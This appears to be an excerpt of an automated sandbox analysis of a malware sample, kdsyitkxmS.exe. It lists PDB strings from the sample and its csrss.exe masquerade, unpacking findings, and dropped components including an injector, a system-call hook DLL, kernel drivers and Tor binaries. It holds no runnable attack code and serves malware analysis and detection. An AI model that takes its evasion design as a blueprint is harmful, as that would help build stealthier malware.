        Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: symsrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
        Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Core.ni.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Numerics.ni.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: System.Transactions.ni.pdbRSDSc source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
        Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Management.ni.pdbRSDSJ< source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: symsrv.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000004308000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000004328000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004578000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004578000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: EfiGuardDxe.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
        Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: dbghelp.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: dbghelp.pdbGCTL source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Loader.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: powershell.exe, 00000035.00000002.209085027998.000000006B5CD000.00000020.00000001.01000000.00000014.sdmp
        Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Data.ni.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
        Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Numerics.ni.pdbRSDSautg source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Unable to locate the .pdb file in this location source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: powershell.exe, 00000035.00000002.209062092812.000000006B23F000.00000020.00000001.01000000.00000018.sdmp
        Source: Binary string: The module signature does not match with .pdb signature. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: .pdb.dbg source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: '(EfiGuardDxe.pdbx source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: ZZC:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: System.Management.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003ED1000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003EF1000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Data.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
        Source: Binary string: System.Management.ni.pdb source: powershell.exe, 00000035.00000002.209104723961.000000006C4B0000.00000020.00000001.01000000.0000000E.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: or you do not have access permission to the .pdb location. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Transactions.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
        Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: kdsyitkxmS.exe, 00000004.00000003.208202854778.000000000415B000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.000000000417B000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.00000000043CB000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.00000000043CB000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: System.Transactions.ni.pdb source: powershell.exe, 00000035.00000002.209083403499.000000006B516000.00000020.00000001.01000000.00000015.sdmp
        Source: Binary string: C:\winirun92 cedojuhexoy.pdb source: kdsyitkxmS.exe, 00000004.00000001.208199622621.0000000000401000.00000020.00000001.01000000.00000004.sdmp, kdsyitkxmS.exe, 0000000A.00000001.208335995035.0000000000401000.00000020.00000001.01000000.00000004.sdmp, csrss.exe, 00000014.00000001.208684568909.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000017.00000001.208779570930.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000001F.00000001.208811296233.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000028.00000001.208833898384.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 0000002B.00000001.208860836082.0000000000401000.00000020.00000001.01000000.00000006.sdmp, csrss.exe, 00000032.00000001.208896227050.0000000000401000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: System.Numerics.pdb source: powershell.exe, 00000035.00000002.209181323602.00000000704F7000.00000020.00000001.01000000.00000011.sdmp
        Source: Binary string: System.Core.ni.pdbRSDS source: powershell.exe, 00000035.00000002.209224649761.0000000071891000.00000020.00000001.01000000.0000000A.sdmp

        Data Obfuscation

        Source: C:\Users\user\Desktop\kdsyitkxmS.exe Unpacked PE file: 4.2.kdsyitkxmS.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe Unpacked PE file: 10.2.kdsyitkxmS.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exe Unpacked PE file: 20.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exe Unpacked PE file: 23.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exe Unpacked PE file: 31.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exe Unpacked PE file: 40.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exe Unpacked PE file: 43.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exe Unpacked PE file: 50.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exe Unpacked PE file: 55.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exe Unpacked PE file: 58.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exe Unpacked PE file: 61.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
        Source: C:\Windows\rss\csrss.exe Code function: 20_3_0C4841B0 push eax; retf
        Source: injector.exe.20.dr Static PE information: section name: _RDATA
        Source: NtQuerySystemInformationHook.dll.20.dr Static PE information: section name: _RDATA
        Source: zlib1.dll.20.dr Static PE information: section name: /4
        Source: tor.exe.20.dr Static PE information: section name: /4
        Source: tor-gencert.exe.20.dr Static PE information: section name: /4
        Source: libwinpthread-1.dll.20.dr Static PE information: section name: /4
        Source: libwinpthread-1.dll.20.dr Static PE information: section name: /14
        Source: libwinpthread-1.dll.20.dr Static PE information: section name: /29
        Source: libwinpthread-1.dll.20.dr Static PE information: section name: /41
        Source: libwinpthread-1.dll.20.dr Static PE information: section name: /55
        Source: libwinpthread-1.dll.20.dr Static PE information: section name: /67
        Source: libwinpthread-1.dll.20.dr Static PE information: section name: /78
        Source: libwinpthread-1.dll.20.dr Static PE information: section name: /89
        Source: libssp-0.dll.20.dr Static PE information: section name: /4
        Source: libssp-0.dll.20.dr Static PE information: section name: /14
        Source: libssp-0.dll.20.dr Static PE information: section name: /29
        Source: libssp-0.dll.20.dr Static PE information: section name: /41
